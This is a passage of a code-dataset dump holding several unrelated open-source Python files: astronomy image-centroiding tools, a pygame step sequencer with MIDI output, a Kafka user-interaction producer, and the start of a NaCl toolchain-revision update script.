"os.path.join", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "re.findall", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "21687717325", "text": "import numpy as np\nfrom astropy.io import fits as pf\nfrom scipy.signal import medfilt2d as medfilt\nfrom scipy import ndimage\nimport pdb\nimport 
matplotlib.pyplot as plt\n\n\n''' ---------------------------------------------------------------------\nA lot of algorithms and diagnostic tools end up relying on a small\nnumber of apparently simple but actually tricky tools to find centroids, \nmask regions of images, locate features, subtract background, ...\n\nthese little tools are assembled here into a single \"library\" that \nshould be included by all programs requiring them.\n\nFrantz.\n--------------------------------------------------------------------- '''\n\ndef mkdisk(cs, c0, r0):\n    ''' ------------------------------------------------------\n    Create a circular mask centered on (x0,y0) in an array of\n    size (xs, ys) with radius r0.\n    Useful for centroid algorithms.\n    ------------------------------------------------------ '''\n    (xs, ys) = cs\n    (x0, y0) = c0\n    x,y = np.meshgrid(np.arange(xs)-x0, np.arange(ys)-y0)\n    dist = np.hypot(y,x)\n    mask = dist <= r0\n    return mask\n\ndef mkbox(cs, c0, cd):\n    ''' ------------------------------------------------------\n    Create a box mask of lower corner (x0,y0) in an array of\n    size (xs, ys), of dimensions (dx, dy).\n    ------------------------------------------------------ '''\n    (xs, ys) = cs\n    (x0, y0) = c0\n    (dx, dy) = cd\n    x,y = np.meshgrid(np.arange(xs), np.arange(ys))\n    mask = (x >= x0) * (x < x0+dx) * (y >= y0) * (y < y0+dy)\n    return mask\n\ndef find_disk_center(img, diam=100):\n    ''' ------------------------------------------------------\n    Locate the center of a disk of given radius in img\n    This algorithm minimizes the flux outside the disk\n    ------------------------------------------------------ '''\n    (ys, xs) = img.shape # size of \"image\"\n    bmask = mkdisk((xs, ys), (xs/2, ys/2), diam/2)\n    mydisk = np.zeros_like(img)\n    mydisk[bmask] = 1.0\n    mydisk = 1 - np.roll(np.roll(mydisk, ys//2, 0), xs//2, 1)\n    \n    temp = medfilt(img.copy() - np.median(img))\n    temp -= temp.min()\n    bval = np.sum(temp)\n\n    thr = np.percentile(temp, 92) # pupil covers 8% of img surface\n    temp[temp < thr] = 0.0\n    temp[temp > thr] = 1.0\n\n    x0, y0, x1, y1 = 0, 0, xs, ys # first iteration search area\n    xcb, ycb = 0, 0\n\n    stp = float(diam)\n\n    while (stp > 0.5):\n        xc = np.arange(x0, x1, stp, dtype=int)\n        yc = np.arange(y0, y1, stp, dtype=int)\n        for i in range(xc.size):\n            for j in range(yc.size):\n                mydisk = np.roll(np.roll(mydisk, xc[i], 0), yc[j], 1)\n                tot_out = np.sum((mydisk) * temp)\n                val = tot_out\n                mydisk = np.roll(np.roll(mydisk, -xc[i], 0), -yc[j], 1)\n                if (val < bval):\n                    bval = val\n                    xcb, ycb = xc[i], yc[j]\n        x0, x1 = 0.5 * (x0 + xcb), 0.5 * (x1 + xcb)\n        y0, y1 = 0.5 * (y0 + ycb), 0.5 * (y1 + ycb)\n        stp *= 0.5\n\n    mydisk = 1.0 - np.roll(np.roll(mydisk, xcb, 0), ycb, 1)\n\n    return((xcb, ycb))\n\n
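# Hypothetical quick check (comment only; the synthetic image below is made\n# up for illustration): a bright off-center disk should be recovered by the\n# coarse-to-fine roll search in find_disk_center(), e.g.:\n#\n#   img = np.zeros((256, 256))\n#   img[mkdisk((256, 256), (140, 120), 50)] = 1.0\n#   print(find_disk_center(img, diam=100))\n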
\ndef find_psf_center(img, verbose=True, nbit=10):\n    ''' -------------------------------------\n    Locate the center of a psf-type image img\n    ------------------------------------- '''\n    temp = img.astype('float')\n    bckg = np.median(temp) # background level\n    temp -= bckg\n    mfilt = medfilt(temp, 3) # median filtered, kernel size = 3\n    (sy, sx) = mfilt.shape # size of \"image\"\n    sxy = np.max([sx, sy])\n\n    xc, yc = sx/2, sy/2 # first estimate for psf center\n\n    signal = np.zeros_like(img)\n    #signal[mfilt > bckg] = 1.0\n    signal[mfilt > 0] = 1.0\n\n    for it in range(nbit):\n        #sz = sx/2/(1.0+(0.1*sx/2*it/(4*nbit)))\n        sz = sxy/2/(1.0+(0.1*sxy/2*it/(4*nbit)))\n        x0 = np.max([int(0.5 + xc - sz), 0])\n        y0 = np.max([int(0.5 + yc - sz), 0])\n        x1 = np.min([int(0.5 + xc + sz), sx])\n        y1 = np.min([int(0.5 + yc + sz), sy])\n\n        mask = np.zeros_like(img)\n        mask[y0:y1, x0:x1] = 1.0\n\n        profx = (mfilt*mask*signal).sum(axis=0)\n        profy = (mfilt*mask*signal).sum(axis=1)\n        \n        xc = (profx*np.arange(sx)).sum() / profx.sum()\n        yc = (profy*np.arange(sy)).sum() / profy.sum()\n\n        if verbose:\n            print(\"it #%2d center = (%.2f, %.2f)\" % (it+1, xc, yc))\n\n    return (xc, yc)\n\ndef locate_speckles(img, nspk=1, xr=5.0, nbit=20):\n    ''' --------------------------------\n    Returns two lists of x,y coordinates \n    of speckles in the image.\n    parameters:\n    - img  : the image to be searched\n    - nspk : # of speckles to profile\n    - xr   : exclusion radius\n    -------------------------------- '''\n    temp = img.copy() # to make sure we don't damage image\n    mfilt = medfilt(temp, 3) # median filtered, kernel size = 3\n    (ys, xs) = mfilt.shape # size of \"image\"\n    spkx, spky = [], [] # speckle coordinates\n    ni = 0 # number of identified speckles\n    \n    while (ni < nspk):\n        # locate maximum in image\n        x1 = mfilt.argmax() % xs\n        y1 = mfilt.argmax() // xs\n        # fine-tune coordinates\n        m1 = mkdisk((xs, ys), (x1, y1), xr)\n        if nbit == 0:\n            (x11, y11) = (x1, y1)\n            mfilt *= (1.0-m1)\n        else:\n            (x11, y11) = find_psf_center((m1) * mfilt, False, nbit)\n            mfilt *= (1.0 - mkdisk((xs, ys), (x11, y11), xr))\n\n        # increment counter of speckles\n        spkx.append(x11)\n        spky.append(y11)\n        ni += 1\n\n    return (spkx, spky)\n\ndef locate_speckles0(img, nspk=1, xr=5.0, nbit=20):\n    mfilt = medfilt(img, 3)\n    #pf.writeto('test.fits', mfilt, clobber=True)\n    vmax = np.percentile(mfilt, 99.95)\n    labeled, nobj = ndimage.label(mfilt > 0.99*vmax)\n    if nobj > 1:\n        mass = ndimage.center_of_mass(img, labeled, range(1,nspk+1))\n    else:\n        mass = []\n    #mass = ndimage.center_of_mass(img, labeled)\n    temp = np.array(mass)\n    return((temp[:,1], temp[:,0]))\n\n", "repo_name": "scexao-org/Instrument-Control-Main", "sub_path": "src/lib/python/img_tools.py", "file_name": "img_tools.py", "file_ext": "py", "file_size_in_byte": 5993, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.meshgrid", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.hypot", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 54, "usage_type": "call"}, {"api_name": "scipy.signal.medfilt2d", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 95, "usage_type": "call"}, {"api_name": "scipy.signal.medfilt2d", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 99, "usage_type": 
"call"}, {"api_name": "numpy.zeros_like", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 122, "usage_type": "call"}, {"api_name": "scipy.signal.medfilt2d", "line_number": 139, "usage_type": "call"}, {"api_name": "scipy.signal.medfilt2d", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 167, "usage_type": "call"}, {"api_name": "scipy.ndimage.label", "line_number": 168, "usage_type": "call"}, {"api_name": "scipy.ndimage", "line_number": 168, "usage_type": "name"}, {"api_name": "scipy.ndimage.center_of_mass", "line_number": 170, "usage_type": "call"}, {"api_name": "scipy.ndimage", "line_number": 170, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 174, "usage_type": "call"}]} +{"seq_id": "6372081275", "text": "import time\nimport pygame\nimport Axon\n\nfrom Axon.SchedulingComponent import SchedulingComponent\nfrom Kamaelia.UI.GraphicDisplay import PygameDisplay\n\nfrom Kamaelia.Apps.Jam.Util.MusicTiming import MusicTimingComponent\n\nclass StepSequencer(MusicTimingComponent):\n \"\"\"\n StepSequencer([numChannels, stepsPerBeat, position, messagePrefix,\n size]) -> new StepSequencer component\n\n A simple step sequencer for programming rhythmic patterns such as drum\n beats\n\n Keyword arguments (all optional):\n numChannels -- The number of channels in the step sequencer (default=4)\n stepsPerBeat -- The number of steps for each beat in the loop. Setting\n this to 2 for example will allow quavers to be played\n (default=1)\n position -- (x,y) position of top left corner in pixels\n messagePrefix -- string to be prepended to all messages\n size -- (w,h) in pixels (default=(500, 200))\n \"\"\"\n\n Inboxes = {\"inbox\" : \"Receive events from Pygame Display\",\n \"remoteChanges\" : \"Receive messages to alter the state of the XY pad\",\n \"event\" : \"Scheduled events\",\n \"sync\" : \"Timing synchronisation\",\n \"control\" : \"For shutdown messages\",\n \"callback\" : \"Receive callbacks from Pygame Display\",\n }\n \n Outboxes = {\"outbox\" : \"XY positions emitted here\",\n \"localChanges\" : \"Messages indicating change in the state of the XY pad emitted here\",\n \"signal\" : \"For shutdown messages\",\n \"display_signal\" : \"Outbox used for communicating to the display surface\"\n }\n \n numChannels = 4\n stepsPerBeat = 1\n position=None\n messagePrefix=\"\"\n size=(500, 200)\n\n def __init__(self, **argd):\n \"\"\"\n x.__init__(...) 
initializes x; see x.__class__.__doc__ for signature\n \"\"\"\n\n super(StepSequencer, self).__init__(**argd)\n\n # Channel init\n # ------------\n self.numSteps = self.beatsPerBar * self.loopBars * self.stepsPerBeat\n self.channels = []\n for i in range(self.numChannels):\n self.channels.append([])\n for j in range(self.numSteps):\n # Steps stored as [velocity, eventId] pairs\n self.channels[i].append([0, None])\n\n # UI Init\n # --------\n # Make the size fit the exact number of beats and channels\n self.size = (self.size[0] - self.size[0] % (self.numSteps) + 1,\n self.size[1] - self.size[1] % len(self.channels) + 2)\n self.positionSize = ((self.size[0]/self.numSteps), 25)\n self.stepSize = (self.size[0]/self.numSteps,\n (self.size[1]-self.positionSize[1])/len(self.channels))\n\n self.dispRequest = {\"DISPLAYREQUEST\" : True,\n \"callback\" : (self,\"callback\"), \n \"events\" : (self, \"inbox\"),\n \"size\": self.size,\n }\n\n if self.position:\n self.dispRequest[\"position\"] = self.position\n\n def addStep(self, step, channel, velocity, send=False):\n \"\"\"\n Turn a step on with a given velocity and add it to the scheduler. If\n the send argument is true then also send a message indicating the step\n has been activated to the \"localChanges\" outbox\n \"\"\"\n self.channels[channel][step][0] = velocity\n self.scheduleStep(step, channel)\n if send:\n self.send((self.messagePrefix + \"Add\", (step, channel, velocity)),\n \"localChanges\")\n\n def removeStep(self, step, channel, send=False):\n \"\"\"\n Turn a step off and remove it from the scheduler. If the send argument\n is true then also send a message indicating the step has been removed\n to the \"localChanges\" outbox\n \"\"\"\n self.channels[channel][step][0] = 0\n self.cancelStep(step, channel)\n if send:\n self.send((self.messagePrefix + \"Remove\", (step, channel)),\n \"localChanges\")\n\n def setVelocity(self, step, channel, velocity, send=False):\n \"\"\"\n Change the velocity of a step. If the send argument is true then also\n send a message indicating the velocity has changed to the\n \"localChanges\" outbox\n \"\"\"\n self.channels[channel][step][0] = velocity\n if send:\n self.send((self.messagePrefix + \"Velocity\",\n (step, channel, velocity)), \"localChanges\")\n\n ###\n # Timing Functions\n ###\n\n def startStep(self): # FIXME: Could maybe do with a better name?\n \"\"\"\n For use after any clock synchronising. 
Update the various timing\n variables, and schedule an initial step update.\n \"\"\"\n self.step = (self.loopBar * self.beatsPerBar + self.beat) * self.stepsPerBeat \n self.lastStepTime = self.lastBeatTime\n self.stepLength = self.beatLength / self.stepsPerBeat\n self.scheduleAbs(\"Step\", self.lastStepTime + self.stepLength, 2)\n \n\n def updateStep(self):\n \"\"\"\n Increment, and roll over if necessary, the step position counter, then\n update the position display.\n \"\"\"\n if self.step < self.numSteps - 1:\n self.step += 1\n else:\n self.step = 0\n self.lastStepTime += self.stepLength\n if self.step == 0:\n prevStep = self.numSteps - 1\n else:\n prevStep = self.step - 1\n self.drawPositionRect(self.step, True)\n self.drawPositionRect(prevStep, False)\n self.scheduleAbs(\"Step\", self.lastStepTime + self.stepLength, 2)\n\n def scheduleStep(self, step, channel):\n \"\"\"\n Schedule a step which has been just been activated\n \"\"\"\n # Easier if we define some stuff here\n beat = self.beat + (self.loopBar * self.beatsPerBar)\n currentStep = beat * self.stepsPerBeat\n loopStart = self.lastStepTime - (self.step * self.stepLength)\n loopLength = self.numSteps * self.stepLength\n\n stepTime = loopStart + (step * self.stepLength)\n if step <= currentStep:\n stepTime += loopLength\n event = self.scheduleAbs((\"StepActive\", step, channel), stepTime, 3)\n self.channels[channel][step][1] = event\n\n def rescheduleStep(self, step, channel):\n \"\"\"\n Reschedule a step to occur again in a loop's time\n \"\"\"\n stepTime = self.lastStepTime + self.numSteps * self.stepLength\n event = self.scheduleAbs((\"StepActive\", step, channel), stepTime, 3)\n self.channels[channel][step][1] = event\n\n def cancelStep(self, step, channel):\n \"\"\"\n Delete a step event from the scheduler\n \"\"\"\n self.cancelEvent(self.channels[channel][step][1])\n self.channels[channel][step][1] = None\n\n ###\n # UI Functions\n ###\n\n def drawMarkings(self):\n self.display.fill((255, 255, 255))\n pygame.draw.line(self.display, (0, 0, 0),\n (0, 0), (self.size[0], 0))\n for i in range(self.numChannels + 1):\n pygame.draw.line(self.display, (0, 0, 0),\n (0, self.positionSize[1] + i * self.stepSize[1]),\n (self.size[0], self.positionSize[1] + i * self.stepSize[1]))\n for i in range(self.numSteps + 1):\n if i % (self.stepsPerBeat * self.loopBars) == 0:\n # Dark lines\n colour = (0, 0, 0)\n elif i % (self.stepsPerBeat) == 0:\n # Lighter lines\n colour = (127, 127, 127)\n else:\n # Even lighter lines\n colour = (190, 190, 190)\n pygame.draw.line(self.display, colour,\n (i * self.stepSize[0], 0),\n (i * self.stepSize[0], self.size[1]))\n self.send({\"REDRAW\":True, \"surface\":self.display}, \"display_signal\")\n\n def drawStepRect(self, step, channel):\n \"\"\"\n Render a single step with a colour corresponding to its velocity\n \"\"\"\n position = (step * self.stepSize[0]+1, channel * self.stepSize[1] + self.positionSize[1] + 1)\n size = (self.stepSize[0] - 1, self.stepSize[1]-1)\n velocity = self.channels[channel][step][0]\n # Rectangle with different brightness reds\n pygame.draw.rect(self.display, (255, 255*(1-velocity),\n 255*(1-velocity)),\n pygame.Rect(position, size))\n\n def drawPositionRect(self, step, active):\n \"\"\"\n Render a single step in the position display, using colour if the\n position is active\n \"\"\"\n position = (step * self.stepSize[0]+1, 1)\n size = (self.positionSize[0] - 1, self.positionSize[1] - 1)\n if active:\n # Yellow\n colour = (255, 255, 0)\n else:\n colour = (255, 255, 255)\n 
pygame.draw.rect(self.display, colour,\n pygame.Rect(position, size))\n self.send({\"REDRAW\":True, \"surface\":self.display}, \"display_signal\")\n\n def positionToStep(self, position):\n \"\"\"\n Convert an (x, y) tuple from the mouse position to a (step, channel)\n tuple\n \"\"\"\n step = position[0]/self.stepSize[0]\n channel = (position[1]-self.positionSize[1])/self.stepSize[1]\n return step, channel\n\n def main(self):\n \"\"\"Main loop.\"\"\"\n displayService = PygameDisplay.getDisplayService()\n self.link((self,\"display_signal\"), displayService)\n\n self.send(self.dispRequest, \"display_signal\")\n\n # Wait until we get a display\n while not self.dataReady(\"callback\"):\n self.pause()\n self.display = self.recv(\"callback\")\n\n self.drawMarkings()\n\n self.send({\"ADDLISTENEVENT\" : pygame.MOUSEBUTTONDOWN,\n \"surface\" : self.display},\n \"display_signal\")\n\n self.send({\"ADDLISTENEVENT\" : pygame.MOUSEBUTTONUP,\n \"surface\" : self.display},\n \"display_signal\")\n\n # Timing init\n # In main because timingSync needs the scheduler to be working\n if self.sync:\n self.timingSync()\n else:\n self.lastBeatTime = time.time()\n self.startBeat()\n self.startStep()\n\n while 1:\n if self.dataReady(\"inbox\"):\n for event in self.recv(\"inbox\"):\n if event.type == pygame.MOUSEBUTTONDOWN:\n bounds = self.display.get_rect()\n # Don't respond to clicks in the position bar\n bounds.top += self.positionSize[1]\n bounds.height -= self.positionSize[1]\n # Don't respond to clicks on the bottom or right border\n bounds.width -= 1\n bounds.height -= 1\n if bounds.collidepoint(*event.pos):\n step, channel = self.positionToStep(event.pos)\n velocity = self.channels[channel][step][0]\n if event.button == 1:\n # Left click\n if velocity > 0:\n # Step off\n self.removeStep(step, channel, True) \n else:\n # Step on\n self.addStep(step, channel, 0.7, True)\n if event.button == 4:\n # Scroll up\n if velocity > 0 and velocity <= 0.95:\n velocity += 0.05\n self.setVelocity(step, channel, velocity,\n True)\n if event.button == 5:\n # Scroll down\n if velocity > 0.05:\n velocity -= 0.05\n self.setVelocity(step, channel, velocity,\n True)\n self.drawStepRect(step, channel)\n self.send({\"REDRAW\":True, \"surface\":self.display},\n \"display_signal\")\n\n if self.dataReady(\"remoteChanges\"):\n data = self.recv(\"remoteChanges\")\n # Only the last part of an OSC address\n address = data[0].split(\"/\")[-1]\n if address == \"Add\":\n self.addStep(*data[1])\n if address == \"Remove\":\n self.removeStep(*data[1])\n if address == \"Velocity\":\n self.setVelocity(*data[1])\n step, channel = data[1][0], data[1][1]\n self.drawStepRect(step, channel)\n\n if self.dataReady(\"event\"):\n data = self.recv(\"event\")\n if data == \"Beat\":\n self.updateBeat()\n elif data == \"Step\":\n self.updateStep()\n elif data[0] == \"StepActive\":\n message, step, channel = data\n velocity = self.channels[channel][step][0]\n self.send((self.messagePrefix + \"On\", (channel, velocity)),\n \"outbox\")\n self.rescheduleStep(step, channel)\n\n if self.dataReady(\"sync\"):\n # Ignore any sync messages once as we have already synced by\n # now\n self.recv(\"sync\")\n\n if not self.anyReady():\n self.pause()\n\nclass StepSequencerMidiConverter(Axon.Component.component):\n channel = 0\n # GM midi drum mapping for note numbers\n mapping = {3:36, # Bass drum\n 2:38, # Snare\n 1:42, # Closed HH\n 0:49} # Crash\n def main(self):\n while 1:\n if self.dataReady(\"inbox\"):\n note, velocity = self.recv(\"inbox\")[1]\n self.send((0x90 + 
self.channel, # Note on message with channel\n                           self.mapping[note], # Note number\n                           int(velocity*127)), # 7 bit velocity\n                          \"outbox\")\n            if self.dataReady(\"control\"):\n                msg = self.recv(\"control\")\n                if (isinstance(msg, Axon.Ipc.producerFinished) or\n                    isinstance(msg, Axon.Ipc.shutdownMicroprocess)):\n                    self.send(msg, \"signal\")\n                    break\n            if not self.anyReady():\n                self.pause()\n            yield 1\n\n\nif __name__ == \"__main__\":\n    StepSequencer().run()\n\n    #from Kamaelia.Chassis.Graphline import Graphline\n    #Graphline(ss1 = StepSequencer(), ss2 = StepSequencer(position=(600, 0)),\n    #          linkages={(\"ss1\",\"localChanges\"):(\"ss2\", \"remoteChanges\")}).run()\n\n    #from Kamaelia.Chassis.Pipeline import Pipeline\n    #from Kamaelia.Apps.Jam.Protocol.Midi import Midi\n    #Pipeline(StepSequencer(), StepSequencerMidiConverter(), Midi(0)).run()\n", "repo_name": "sparkslabs/kamaelia_", "sub_path": "Sketches/JT/Jam/library/trunk/Kamaelia/Apps/Jam/UI/StepSequencer.py", "file_name": "StepSequencer.py", "file_ext": "py", "file_size_in_byte": 15384, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 13, "dataset": "github-code", "pt": "52", "api": [{"api_name": "Kamaelia.Apps.Jam.Util.MusicTiming.MusicTimingComponent", "line_number": 10, "usage_type": "name"}, {"api_name": "pygame.draw.line", "line_number": 188, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 188, "usage_type": "attribute"}, {"api_name": "pygame.draw.line", "line_number": 191, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 191, "usage_type": "attribute"}, {"api_name": "pygame.draw.line", "line_number": 204, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 204, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 217, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 217, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 219, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 233, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 233, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 234, "usage_type": "call"}, {"api_name": "Kamaelia.UI.GraphicDisplay.PygameDisplay.getDisplayService", "line_number": 248, "usage_type": "call"}, {"api_name": "Kamaelia.UI.GraphicDisplay.PygameDisplay", "line_number": 248, "usage_type": "name"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 260, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONUP", "line_number": 264, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 273, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 280, "usage_type": "attribute"}, {"api_name": "Axon.Component", "line_number": 349, "usage_type": "attribute"}]}
+{"seq_id": "26867815347", "text": "'''\nAuthor: Thomas Theisen\n\nObjective: Aggregate interactions between users. Either post author to comment author or comment author to \n           comment author. This information will be used to personalize responses/replies to maximize the \n           propensity for a user to reply back. \n\n'''\n\n# Python Modules\n#-----------------------------------------------------------------------------#\nimport pickle\n\n# Internal Modules\n#-----------------------------------------------------------------------------#\nfrom kafka import KafkaProducer\nimport mongodb\nimport options\n\ndb = options.mongodb_database_healthcare\ncoll = options.mongodb_collection_healthcare\nproducer = KafkaProducer(bootstrap_servers = ['localhost:9092'])\n\nmongo = mongodb.MongoDB(db, coll, None)\n\ndef insertion(connections, postid, parent, child, child_author):\n\n    if not bool(connections):\n        current_postid = None\n    else:\n        current_postid = next(iter(connections)) \n\n    if not bool(connections): \n        print('New Post Incoming')\n        post_author = mongo.return_post_author(postid)\n\n        #Create pointer between id and author\n        connections[postid] = {}\n        connections[postid][parent] = post_author\n        connections[postid][child] = child_author\n\n    elif bool(connections) and current_postid == postid:\n        print('Receiving Data from the same post')\n        connections[postid][child] = child_author\n\n    elif bool(connections) and current_postid != postid: #Moving onto next post\n        print('Moving onto next post')\n        deletion(connections, current_postid)\n        post_author = mongo.return_post_author(postid)\n\n        #Create pointer between id and author\n        connections[postid] = {}\n        connections[postid][parent] = post_author\n        connections[postid][child] = child_author\n\n    #Send interaction\n    inner = connections[postid]\n    parent_author = inner.get(parent)\n    # print('sent postid: {}, parent_author: {}, child_author: {}'.format(postid, parent_author, child_author))\n    send_associations(postid, parent_author, child_author)\n    print('sent interaction')\n\n    return connections\n\ndef send_associations(postid, author1, author2): #Send the users that interacted and on what post\n    interaction = (postid, author1, author2)\n    interaction_bytes = serialize(interaction)\n    producer.send('associations', interaction_bytes)\n    producer.flush()\n\n
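# Hypothetical consumer-side sketch (comment only): the pickled\n# (postid, parent_author, child_author) tuples published by send_associations()\n# can be read back with kafka-python, mirroring the producer config above:\n#\n#   from kafka import KafkaConsumer\n#   consumer = KafkaConsumer('associations', bootstrap_servers=['localhost:9092'])\n#   for message in consumer:\n#       postid, parent_author, child_author = pickle.loads(message.value)\n\n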
def serialize(data):\n    return pickle.dumps(data)\n    \ndef deletion(connections, postid):\n    return connections.pop(postid)\n\n", "repo_name": "TTheisen/textgen", "sub_path": "src/associations.py", "file_name": "associations.py", "file_ext": "py", "file_size_in_byte": 2536, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "options.mongodb_database_healthcare", "line_number": 20, "usage_type": "attribute"}, {"api_name": "options.mongodb_collection_healthcare", "line_number": 21, "usage_type": "attribute"}, {"api_name": "kafka.KafkaProducer", "line_number": 22, "usage_type": "call"}, {"api_name": "mongodb.MongoDB", "line_number": 24, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 72, "usage_type": "call"}]}
+{"seq_id": "13018797065", "text": "import argparse\nimport collections\nimport datetime\nimport email.mime.text\nimport getpass\nimport os\nimport re\nimport smtplib\nimport subprocess\nimport sys\nimport tempfile\n\ntry:\n  from dateutil import parser as dateutilparser\nexcept:\n  sys.stdout.write(\"Please `apt-get install python-dateutil`: \"\n                   \"Python's datetime packages don't handle timezones.\")\n  raise\n\n\nBUILD_DIR = os.path.dirname(__file__)\nNACL_DIR = os.path.dirname(BUILD_DIR)\nTOOLCHAIN_REV_DIR = os.path.join(NACL_DIR, 'toolchain_revisions')\nPKG_VER = os.path.join(BUILD_DIR, 'package_version', 'package_version.py')\n\nDEFAULT_HASH='0000000000000000000000000000000000000000'\nPNACL_PACKAGE = 'pnacl_newlib'\n\n\ndef 
ParseArgs(args):\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=\"\"\"Update pnacl_newlib.json PNaCl version.\n\nLLVM and other projects are checked-in to the NaCl repository, but their head\nisn't necessarily the one that we currently use in PNaCl. The pnacl_newlib.json\nand pnacl_translator.json files point at git revisions to use for tools such as\nLLVM. Our build process then downloads pre-built tool tarballs from the\ntoolchain build waterfall.\n\ngit repository before running this script:\n ______________________\n | |\n v |\n ...----A------B------C------D------ NaCl HEAD\n ^ ^ ^ ^\n | | | |__ Latest pnacl_{newlib,translator}.json update.\n | | |\n | | |__ A newer LLVM change (LLVM repository HEAD).\n | |\n | |__ Oldest LLVM change since this PNaCl version.\n |\n |__ pnacl_{newlib,translator}.json points at an older LLVM change.\n\ngit repository after running this script:\n _______________\n | |\n v |\n ...----A------B------C------D------E------ NaCl HEAD\n\nNote that there could be any number of non-PNaCl changes between each of these\nchangelists, and that the user can also decide to update the pointer to B\ninstead of C.\n\nThere is further complication when toolchain builds are merged.\n\"\"\")\n parser.add_argument('--email', metavar='ADDRESS', type=str,\n default=getpass.getuser()+'@chromium.org',\n help=\"Email address to send errors to.\")\n parser.add_argument('--hash', metavar='HASH',\n help=\"Update to a specific git hash instead of the most \"\n \"recent git hash with a PNaCl change. This value must \"\n \"be more recent than the one in the current \"\n \"pnacl_newlib.json. This option is useful when multiple \"\n \"changelists' toolchain builds were merged, or when \"\n \"too many PNaCl changes would be pulled in at the \"\n \"same time.\")\n parser.add_argument('-n', '--dry-run', default=False, action='store_true',\n help=\"Print the changelist that would be sent, but \"\n \"don't actually send anything to review.\")\n parser.add_argument('--ignore-branch', default=False, action='store_true',\n help='Allow script to run from branches other than '\n 'master')\n # TODO(jfb) The following options come from download_toolchain.py and\n # should be shared in some way.\n parser.add_argument('--filter_out_predicates', default=[],\n help=\"Toolchains to filter out.\")\n return parser.parse_args()\n\n\ndef ExecCommand(command):\n try:\n return subprocess.check_output(command, stderr=subprocess.STDOUT)\n except subprocess.CalledProcessError as e:\n sys.stderr.write('\\nRunning `%s` returned %i, got:\\n%s\\n' %\n (' '.join(e.cmd), e.returncode, e.output))\n raise\n\n\ndef GetCurrentRevision():\n return ExecCommand([sys.executable, PKG_VER,\n 'getrevision',\n '--revision-package', PNACL_PACKAGE]).strip()\n\n\ndef SetCurrentRevision(hash):\n ExecCommand([sys.executable, PKG_VER,\n 'setrevision',\n '--revision-set', PNACL_PACKAGE,\n '--revision', hash])\n\n\ndef GetRevisionPackageFiles():\n out = ExecCommand([sys.executable, PKG_VER,\n 'revpackages',\n '--revision-set', PNACL_PACKAGE])\n package_list = [package.strip() for package in out.strip().split('\\n')]\n return [os.path.join(TOOLCHAIN_REV_DIR, '%s.json' % package)\n for package in package_list]\n\n\ndef GitCurrentBranch():\n return ExecCommand(['git', 'symbolic-ref', 'HEAD', '--short']).strip()\n\n\ndef GitRevParse(rev):\n return ExecCommand(['git', 'rev-parse', rev]).strip()\n\n\ndef GitStatus():\n \"\"\"List of statuses, one per path, of paths in the current git 
